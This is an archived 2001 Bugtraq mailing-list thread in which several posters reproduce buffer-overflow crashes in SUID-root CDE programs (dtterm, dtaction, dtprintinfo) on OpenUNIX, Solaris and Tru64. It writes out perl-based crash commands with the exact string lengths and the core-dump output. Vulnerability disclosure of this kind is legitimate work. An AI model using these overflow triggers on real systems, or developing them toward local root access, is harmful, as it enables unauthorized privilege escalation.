OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Bob Dog (bobdogdrunk.co.nz)
Date: Wed Oct 03 2001 - 17:07:43 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    This also works for the following on Tru64 5.1;

    $ /usr/dt/bin/dtaction `perl -e 'print "A"x8203'`
    Memory fault(coredump)

    $ /usr/dt/bin/dtprintinfo -session `perl -e 'print
    "A"x8203'`
    Memory fault(coredump)

    All of these; dtterm, dtaction and dtprintinfo
    are SUID root by default.

    --- Bob Dog <bobdogdrunk.co.nz>
    > wrote:
    >I could reproduce this on True64 5.1 on an AlphaStation
    >but I had to go all the way to 8203. Using values
    >below 4590 caused no problems. Starting at values
    >of 4590 up to 8202 a dtterm window will open normally
    >and everything seems normal but the 'clear' command
    >will cause a coredump. However, the teminal window will
    >still remain active. Other commands don't seem to cause
    >problems.
    >
    >$ uname -a
    >OSF1 red5 V5.1 732 alpha
    >$ /usr/dt/bin/dtterm -tn `perl -e 'print "A"x8203'`
    >Memory fault(coredump)
    >
    >Bob
    >
    >
    >--- "Cushing, David" <David.Cushinghitachisoftware.com>
    >> wrote:
    >>I was able to reproduce this on a Solaris 8 sparc machine with different
    >>tolerances:
    >>
    >>[288] uname -a
    >>SunOS hostname 5.8 Generic_108528-08 sun4u sparc SUNW,Ultra-60
    >>[289] /usr/dt/bin/dtterm -tn `perl -e 'print "A"x1083'`
    >>Segmentation Fault(coredump)
    >>[297] /usr/dt/bin/dtterm -tn `perl -e 'print "A"x2083'`
    >>Bus Error(coredump)
    >>ginger:dcushing[298]=20
    >>
    >>-David
    >>
    >>> -----Original Message-----
    >>> From: Aycan Irican [mailto:aycanmars.prosoft.com.tr]
    >>> Sent: Tuesday, October 02, 2001 1:55 AM
    >>> To: bugtraqsecurityfocus.com
    >>> Cc: evrimenvy.com.tr
    >>> Subject: OpenUNIX 8 & Unixware possible local root
    >>>=20
    >>>=20
    >>> -----BEGIN PGP SIGNED MESSAGE-----
    >>> Hash: SHA1
    >>>=20
    >>> Another dt series bug...
    >>>=20
    >>> $ uname -a=20
    >>> OpenUNIX zen 5 8.0.0 i386 x86at Caldera UNIX_SVR5=20
    >>> $ id=20
    >>> uid=3D101(fixxxer) gid=3D1(other)=20
    >>> $ ls -al /usr/dt/bin/dtterm=20
    >>> - -r-sr-xr-x 1 root bin 60892 Haz 10 05:03=20
    >>> /usr/dt/bin/dtterm=20
    >>> $ /usr/dt/bin/dtterm -tn `perl -e 'print "A"x1040'`=20
    >>> Warning: Missing charsets in String to FontSet conversion=20
    >>> Warning: Missing charsets in String to FontSet conversion=20
    >>> Memory fault=20
    >>> .. snip ..=20
    >
    >_____________________________________________________________
    >Visit these sites today
    >Blink 182 Fan Site - www.blink182.co.nz
    >NZ Skateboarding - www.nzskate.com

    _____________________________________________________________
    Visit these sites today
    Blink 182 Fan Site - www.blink182.co.nz
    NZ Skateboarding - www.nzskate.com